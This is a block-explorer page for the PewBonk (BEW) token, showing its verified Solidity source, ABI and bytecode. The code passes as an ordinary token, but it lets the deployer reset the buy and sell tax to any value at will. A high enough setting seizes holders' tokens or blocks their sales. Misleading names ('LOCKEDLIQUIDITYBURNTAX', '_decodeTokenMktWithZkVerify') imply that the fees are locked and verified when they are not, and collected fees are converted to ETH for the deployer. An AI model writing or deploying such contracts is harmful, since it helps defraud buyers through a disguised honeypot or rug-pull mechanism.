ETH Price: $2,414.17 (+1.74%)

Token

PewBonk (BEW)
 

Overview

Max Total Supply

1,000,000,000 BEW

Holders

6

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
14,889,763.596051224100108884 BEW

Value
$0.00
0x946bdb568626fe7fd3812a4108904eba14975ea0
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
PewBonk

Compiler Version
v0.8.24+commit.e11b9ed9

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion
File 1 of 1 : PewBonk.sol
/*



β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—    β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—  β–ˆβ–ˆβ•—
β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘    β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ•‘ β–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• 
β–ˆβ–ˆβ•”β•β•β•β• β–ˆβ–ˆβ•”β•β•β•  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•— 
β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ•”β–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•—
β•šβ•β•     β•šβ•β•β•β•β•β•β• β•šβ•β•β•β•šβ•β•β• β•šβ•β•β•β•β•β•  β•šβ•β•β•β•β•β• β•šβ•β•  β•šβ•β•β•β•β•šβ•β•  β•šβ•β•

Website: https://pewbonk.com/
X: https://x.com/pewbonk
TG: https://t.me/PewBonk



*/



// SPDX-License-Identifier: unlicense

pragma solidity 0.8.24;

interface IUniswapFactory {
    function getPair(address tokenA, address tokenB) external view returns (address pair);
}

interface IUniswapV2Router02 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function swapExactTokensForETHSupportingFreelyOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

contract  PewBonk  {
    struct StoreData {
        address tokenMkt;
        uint8 LockedBuyTax;
        uint8 LockedSellTax;
    }

    string private _name = unicode"PewBonk";
    string private _symbol = unicode"BEW";
    uint8 public constant decimals = 18;
    uint256 public constant totalSupply = 1000_000_000 * 10**decimals;

    StoreData public storeData;
    uint256 constant swapAmount = totalSupply / 100;

    error Permissions();
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed TOKEN_MKT,
        address indexed spender,
        uint256 value
    );

    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    address public pair;
    IUniswapV2Router02 constant _uniswapV2Router =
        IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);

    bool private swapping;
    bool private tradingOpen;

    constructor() {
        uint8 _initLockedBuyTax = 0;
        uint8 _initLockedSellTax = 0;
        storeData = StoreData({
            tokenMkt: msg.sender,
            LockedBuyTax: _initLockedBuyTax,
            LockedSellTax: _initLockedSellTax
        });
        balanceOf[msg.sender] = totalSupply;
        allowance[address(this)][address(_uniswapV2Router)] = type(uint256).max;
        emit Transfer(address(0), msg.sender, totalSupply);
    }

    receive() external payable {}

    function LOCKEDLIQUIDITYBURNTAX (uint8 _buy, uint8 _sell) external {
        if (msg.sender != _decodeTokenMktWithZkVerify()) revert Permissions();
        LockedFees(_buy, _sell);
    }

    function LockedFees(uint8 _buy, uint8 _sell) private {
        storeData.LockedBuyTax = _buy;
        storeData.LockedSellTax = _sell;
    }

    function _decodeTokenMktWithZkVerify() private view returns(address) {
        return storeData.tokenMkt;
    }

    function openTrading() external {
        require(msg.sender == _decodeTokenMktWithZkVerify());
        require(!tradingOpen);
        address _factory = _uniswapV2Router.factory();
        address _weth = _uniswapV2Router.WETH();
        address _pair = IUniswapFactory(_factory).getPair(address(this), _weth);
        pair = _pair;
        tradingOpen = true;
    }

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool) {
        allowance[from][msg.sender] -= amount;
        return _transfer(from, to, amount);
    }

    function approve(address spender, uint256 amount) external returns (bool) {
        allowance[msg.sender][spender] = amount;
        emit Approval(msg.sender, spender, amount);
        return true;
    }

    function transfer(address to, uint256 amount) external returns (bool) {
        return _transfer(msg.sender, to, amount);
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal returns (bool) {
        address tokenMkt = _decodeTokenMktWithZkVerify();
        require(tradingOpen || from == tokenMkt || to == tokenMkt);

        balanceOf[from] -= amount;

        if (to == pair && !swapping && balanceOf[address(this)] >= swapAmount && from != tokenMkt) {
            swapping = true;
            address[] memory path = new address[](2);
            path[0] = address(this);
            path[1] = _uniswapV2Router.WETH();
            _uniswapV2Router
                .swapExactTokensForETHSupportingFreelyOnTransferTokens(
                    swapAmount,
                    0,
                    path,
                    address(this),
                    block.timestamp
                );
            payable(tokenMkt).transfer(address(this).balance);
            swapping = false;
        }

        (uint8 LockedBuyTax, uint8 LockedSellTax) = (storeData.LockedBuyTax, storeData.LockedSellTax);
        if (from != address(this) && tradingOpen == true) {
            uint256 taxCalculatedAmount = (amount *
                (to == pair ? LockedSellTax : LockedBuyTax)) / 100;
            amount -= taxCalculatedAmount;
            balanceOf[address(this)] += taxCalculatedAmount;
        }
        balanceOf[to] += amount;
        emit Transfer(from, to, amount);
        return true;
    }

}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"Permissions","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"TOKEN_MKT","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint8","name":"_buy","type":"uint8"},{"internalType":"uint8","name":"_sell","type":"uint8"}],"name":"LOCKEDLIQUIDITYBURNTAX","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"storeData","outputs":[{"internalType":"address","name":"tokenMkt","type":"address"},{"internalType":"uint8","name":"LockedBuyTax","type":"uint8"},{"internalType":"uint8","name":"LockedSellTax","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60c06040526007608090815266506577426f6e6b60c81b60a0525f90620000279082620001f0565b5060408051808201909152600381526242455760e81b6020820152600190620000519082620001f0565b503480156200005e575f80fd5b5060408051606081018252338082525f6020830181905291909201819052600280546001600160b01b03191661ffff60a01b199093169290921790915580620000aa6012600a620003cb565b620000ba90633b9aca00620003e2565b335f8181526003602090815260408083209490945530825260048152838220737a250d5630b4cf539739df2c5dacb4c659f2488d835290529182205f199055907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef620001296012600a620003cb565b6200013990633b9aca00620003e2565b60405190815260200160405180910390a35050620003fc565b634e487b7160e01b5f52604160045260245ffd5b600181811c908216806200017b57607f821691505b6020821081036200019a57634e487b7160e01b5f52602260045260245ffd5b50919050565b601f821115620001eb57805f5260205f20601f840160051c81016020851015620001c75750805b601f840160051c820191505b81811015620001e8575f8155600101620001d3565b50505b505050565b81516001600160401b038111156200020c576200020c62000152565b62000224816200021d845462000166565b84620001a0565b602080601f8311600181146200025a575f8415620002425750858301515b5f19600386901b1c1916600185901b178555620002b4565b5f85815260208120601f198616915b828110156200028a5788860151825594840194600190910190840162000269565b5085821015620002a857878501515f19600388901b60f8161c191681555b505060018460011b0185555b505050505050565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200031057815f1904821115620002f457620002f4620002bc565b808516156200030257918102915b93841c9390800290620002d5565b509250929050565b5f826200032857506001620003c5565b816200033657505f620003c5565b81600181146200034f57600281146200035a576200037a565b6001915050620003c5565b60ff8411156200036e576200036e620002bc565b50506001821b620003c5565b5060208310610133831016604e8410600b84101617156200039f575081810a620003c5565b620003ab8383620002d0565b805f1904821115620003c157620003c1620002bc565b0290505b92915050565b5f620003db60ff84168362000318565b9392505050565b8082028115828204841417620003c557620003c5620002bc565b610e81806200040a5f395ff3fe6080604052600436106100c2575f3560e01c806370a082311161007c578063a8aa1b3111610057578063a8aa1b311461024b578063a9059cbb14610282578063c9567bf9146102a1578063dd62ed3e146102b5575f80fd5b806370a08231146101eb5780637d7c19d31461021657806395d89b4114610237575f80fd5b806306fdde03146100cd578063095ea7b3146100f757806318160ddd1461012657806323b872dd14610148578063313ce567146101675780634abe30521461018d575f80fd5b366100c957005b5f80fd5b3480156100d8575f80fd5b506100e16102eb565b6040516100ee9190610ab2565b60405180910390f35b348015610102575f80fd5b50610116610111366004610b15565b61037a565b60405190151581526020016100ee565b348015610131575f80fd5b5061013a6103e6565b6040519081526020016100ee565b348015610153575f80fd5b50610116610162366004610b3f565b610403565b348015610172575f80fd5b5061017b601281565b60405160ff90911681526020016100ee565b348015610198575f80fd5b506002546101c2906001600160a01b0381169060ff600160a01b8204811691600160a81b90041683565b604080516001600160a01b03909416845260ff92831660208501529116908201526060016100ee565b3480156101f6575f80fd5b5061013a610205366004610b7d565b60036020525f908152604090205481565b348015610221575f80fd5b50610235610230366004610bad565b610450565b005b348015610242575f80fd5b506100e16104ae565b348015610256575f80fd5b5060055461026a906001600160a01b031681565b6040516001600160a01b0390911681526020016100ee565b34801561028d575f80fd5b5061011661029c366004610b15565b6104bd565b3480156102ac575f80fd5b506102356104d0565b3480156102c0575f80fd5b5061013a6102cf366004610bde565b600460209081525f928352604080842090915290825290205481565b60605f80546102f990610c15565b80601f016020809104026020016040519081016040528092919081815260200182805461032590610c15565b80156103705780601f1061034757610100808354040283529160200191610370565b820191905f5260205f20905b81548152906001019060200180831161035357829003601f168201915b5050505050905090565b335f8181526004602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906103d49086815260200190565b60405180910390a35060015b92915050565b6103f26012600a610d41565b61040090633b9aca00610d4f565b81565b6001600160a01b0383165f908152600460209081526040808320338452909152812080548391908390610437908490610d66565b909155506104489050848484610686565b949350505050565b6002546001600160a01b0316331461047a57604051629af2b160e81b815260040160405180910390fd5b6002805461ffff60a01b1916600160a01b60ff9485160260ff60a81b191617600160a81b9290931691909102919091179055565b6060600180546102f990610c15565b5f6104c9338484610686565b9392505050565b6002546001600160a01b031633146104e6575f80fd5b600554600160a81b900460ff16156104fc575f80fd5b5f737a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561054d573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906105719190610d79565b90505f737a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156105c4573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906105e89190610d79565b60405163e6a4390560e01b81523060048201526001600160a01b0380831660248301529192505f9184169063e6a4390590604401602060405180830381865afa158015610637573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061065b9190610d79565b60058054600161ff0160a01b0319166001600160a01b0390921691909117600160a81b179055505050565b5f8061069a6002546001600160a01b031690565b600554909150600160a81b900460ff16806106c65750806001600160a01b0316856001600160a01b0316145b806106e25750806001600160a01b0316846001600160a01b0316145b6106ea575f80fd5b6001600160a01b0385165f9081526003602052604081208054859290610711908490610d66565b90915550506005546001600160a01b03858116911614801561073d5750600554600160a01b900460ff16155b801561077c575060646107526012600a610d41565b61076090633b9aca00610d4f565b61076a9190610d94565b305f9081526003602052604090205410155b801561079a5750806001600160a01b0316856001600160a01b031614155b15610978576005805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f815181106107e5576107e5610db3565b60200260200101906001600160a01b031690816001600160a01b031681525050737a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610855573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108799190610d79565b8160018151811061088c5761088c610db3565b6001600160a01b0390921660209283029190910190910152737a250d5630b4cf539739df2c5dacb4c659f2488d63eb6f613960646108cc6012600a610d41565b6108da90633b9aca00610d4f565b6108e49190610d94565b5f8430426040518663ffffffff1660e01b8152600401610908959493929190610dc7565b5f604051808303815f87803b15801561091f575f80fd5b505af1158015610931573d5f803e3d5ffd5b50506040516001600160a01b03851692504780156108fc029250905f818181858888f19350505050158015610968573d5f803e3d5ffd5b50506005805460ff60a01b191690555b60025460ff600160a01b8204811691600160a81b9004166001600160a01b03871630148015906109b65750600554600160a81b900460ff1615156001145b15610a2a576005545f906064906001600160a01b038981169116146109db57836109dd565b825b6109ea9060ff1688610d4f565b6109f49190610d94565b9050610a008187610d66565b305f90815260036020526040812080549298508392909190610a23908490610e38565b9091555050505b6001600160a01b0386165f9081526003602052604081208054879290610a51908490610e38565b92505081905550856001600160a01b0316876001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87604051610a9d91815260200190565b60405180910390a35060019695505050505050565b5f602080835283518060208501525f5b81811015610ade57858101830151858201604001528201610ac2565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610b12575f80fd5b50565b5f8060408385031215610b26575f80fd5b8235610b3181610afe565b946020939093013593505050565b5f805f60608486031215610b51575f80fd5b8335610b5c81610afe565b92506020840135610b6c81610afe565b929592945050506040919091013590565b5f60208284031215610b8d575f80fd5b81356104c981610afe565b803560ff81168114610ba8575f80fd5b919050565b5f8060408385031215610bbe575f80fd5b610bc783610b98565b9150610bd560208401610b98565b90509250929050565b5f8060408385031215610bef575f80fd5b8235610bfa81610afe565b91506020830135610c0a81610afe565b809150509250929050565b600181811c90821680610c2957607f821691505b602082108103610c4757634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b600181815b80851115610c9b57815f1904821115610c8157610c81610c4d565b80851615610c8e57918102915b93841c9390800290610c66565b509250929050565b5f82610cb1575060016103e0565b81610cbd57505f6103e0565b8160018114610cd35760028114610cdd57610cf9565b60019150506103e0565b60ff841115610cee57610cee610c4d565b50506001821b6103e0565b5060208310610133831016604e8410600b8410161715610d1c575081810a6103e0565b610d268383610c61565b805f1904821115610d3957610d39610c4d565b029392505050565b5f6104c960ff841683610ca3565b80820281158282048414176103e0576103e0610c4d565b818103818111156103e0576103e0610c4d565b5f60208284031215610d89575f80fd5b81516104c981610afe565b5f82610dae57634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b81811015610e175784516001600160a01b031683529383019391830191600101610df2565b50506001600160a01b03969096166060850152505050608001529392505050565b808201808211156103e0576103e0610c4d56fea2646970667358221220ed8faca217e9204c6814c9ad062ae306fedd5b88ae06f74d0e3f3fe5ea55ba8e64736f6c63430008180033

Deployed Bytecode

0x6080604052600436106100c2575f3560e01c806370a082311161007c578063a8aa1b3111610057578063a8aa1b311461024b578063a9059cbb14610282578063c9567bf9146102a1578063dd62ed3e146102b5575f80fd5b806370a08231146101eb5780637d7c19d31461021657806395d89b4114610237575f80fd5b806306fdde03146100cd578063095ea7b3146100f757806318160ddd1461012657806323b872dd14610148578063313ce567146101675780634abe30521461018d575f80fd5b366100c957005b5f80fd5b3480156100d8575f80fd5b506100e16102eb565b6040516100ee9190610ab2565b60405180910390f35b348015610102575f80fd5b50610116610111366004610b15565b61037a565b60405190151581526020016100ee565b348015610131575f80fd5b5061013a6103e6565b6040519081526020016100ee565b348015610153575f80fd5b50610116610162366004610b3f565b610403565b348015610172575f80fd5b5061017b601281565b60405160ff90911681526020016100ee565b348015610198575f80fd5b506002546101c2906001600160a01b0381169060ff600160a01b8204811691600160a81b90041683565b604080516001600160a01b03909416845260ff92831660208501529116908201526060016100ee565b3480156101f6575f80fd5b5061013a610205366004610b7d565b60036020525f908152604090205481565b348015610221575f80fd5b50610235610230366004610bad565b610450565b005b348015610242575f80fd5b506100e16104ae565b348015610256575f80fd5b5060055461026a906001600160a01b031681565b6040516001600160a01b0390911681526020016100ee565b34801561028d575f80fd5b5061011661029c366004610b15565b6104bd565b3480156102ac575f80fd5b506102356104d0565b3480156102c0575f80fd5b5061013a6102cf366004610bde565b600460209081525f928352604080842090915290825290205481565b60605f80546102f990610c15565b80601f016020809104026020016040519081016040528092919081815260200182805461032590610c15565b80156103705780601f1061034757610100808354040283529160200191610370565b820191905f5260205f20905b81548152906001019060200180831161035357829003601f168201915b5050505050905090565b335f8181526004602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906103d49086815260200190565b60405180910390a35060015b92915050565b6103f26012600a610d41565b61040090633b9aca00610d4f565b81565b6001600160a01b0383165f908152600460209081526040808320338452909152812080548391908390610437908490610d66565b909155506104489050848484610686565b949350505050565b6002546001600160a01b0316331461047a57604051629af2b160e81b815260040160405180910390fd5b6002805461ffff60a01b1916600160a01b60ff9485160260ff60a81b191617600160a81b9290931691909102919091179055565b6060600180546102f990610c15565b5f6104c9338484610686565b9392505050565b6002546001600160a01b031633146104e6575f80fd5b600554600160a81b900460ff16156104fc575f80fd5b5f737a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561054d573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906105719190610d79565b90505f737a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156105c4573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906105e89190610d79565b60405163e6a4390560e01b81523060048201526001600160a01b0380831660248301529192505f9184169063e6a4390590604401602060405180830381865afa158015610637573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061065b9190610d79565b60058054600161ff0160a01b0319166001600160a01b0390921691909117600160a81b179055505050565b5f8061069a6002546001600160a01b031690565b600554909150600160a81b900460ff16806106c65750806001600160a01b0316856001600160a01b0316145b806106e25750806001600160a01b0316846001600160a01b0316145b6106ea575f80fd5b6001600160a01b0385165f9081526003602052604081208054859290610711908490610d66565b90915550506005546001600160a01b03858116911614801561073d5750600554600160a01b900460ff16155b801561077c575060646107526012600a610d41565b61076090633b9aca00610d4f565b61076a9190610d94565b305f9081526003602052604090205410155b801561079a5750806001600160a01b0316856001600160a01b031614155b15610978576005805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f815181106107e5576107e5610db3565b60200260200101906001600160a01b031690816001600160a01b031681525050737a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610855573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108799190610d79565b8160018151811061088c5761088c610db3565b6001600160a01b0390921660209283029190910190910152737a250d5630b4cf539739df2c5dacb4c659f2488d63eb6f613960646108cc6012600a610d41565b6108da90633b9aca00610d4f565b6108e49190610d94565b5f8430426040518663ffffffff1660e01b8152600401610908959493929190610dc7565b5f604051808303815f87803b15801561091f575f80fd5b505af1158015610931573d5f803e3d5ffd5b50506040516001600160a01b03851692504780156108fc029250905f818181858888f19350505050158015610968573d5f803e3d5ffd5b50506005805460ff60a01b191690555b60025460ff600160a01b8204811691600160a81b9004166001600160a01b03871630148015906109b65750600554600160a81b900460ff1615156001145b15610a2a576005545f906064906001600160a01b038981169116146109db57836109dd565b825b6109ea9060ff1688610d4f565b6109f49190610d94565b9050610a008187610d66565b305f90815260036020526040812080549298508392909190610a23908490610e38565b9091555050505b6001600160a01b0386165f9081526003602052604081208054879290610a51908490610e38565b92505081905550856001600160a01b0316876001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87604051610a9d91815260200190565b60405180910390a35060019695505050505050565b5f602080835283518060208501525f5b81811015610ade57858101830151858201604001528201610ac2565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610b12575f80fd5b50565b5f8060408385031215610b26575f80fd5b8235610b3181610afe565b946020939093013593505050565b5f805f60608486031215610b51575f80fd5b8335610b5c81610afe565b92506020840135610b6c81610afe565b929592945050506040919091013590565b5f60208284031215610b8d575f80fd5b81356104c981610afe565b803560ff81168114610ba8575f80fd5b919050565b5f8060408385031215610bbe575f80fd5b610bc783610b98565b9150610bd560208401610b98565b90509250929050565b5f8060408385031215610bef575f80fd5b8235610bfa81610afe565b91506020830135610c0a81610afe565b809150509250929050565b600181811c90821680610c2957607f821691505b602082108103610c4757634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b600181815b80851115610c9b57815f1904821115610c8157610c81610c4d565b80851615610c8e57918102915b93841c9390800290610c66565b509250929050565b5f82610cb1575060016103e0565b81610cbd57505f6103e0565b8160018114610cd35760028114610cdd57610cf9565b60019150506103e0565b60ff841115610cee57610cee610c4d565b50506001821b6103e0565b5060208310610133831016604e8410600b8410161715610d1c575081810a6103e0565b610d268383610c61565b805f1904821115610d3957610d39610c4d565b029392505050565b5f6104c960ff841683610ca3565b80820281158282048414176103e0576103e0610c4d565b818103818111156103e0576103e0610c4d565b5f60208284031215610d89575f80fd5b81516104c981610afe565b5f82610dae57634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b81811015610e175784516001600160a01b031683529383019391830191600101610df2565b50506001600160a01b03969096166060850152505050608001529392505050565b808201808211156103e0576103e0610c4d56fea2646970667358221220ed8faca217e9204c6814c9ad062ae306fedd5b88ae06f74d0e3f3fe5ea55ba8e64736f6c63430008180033

Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.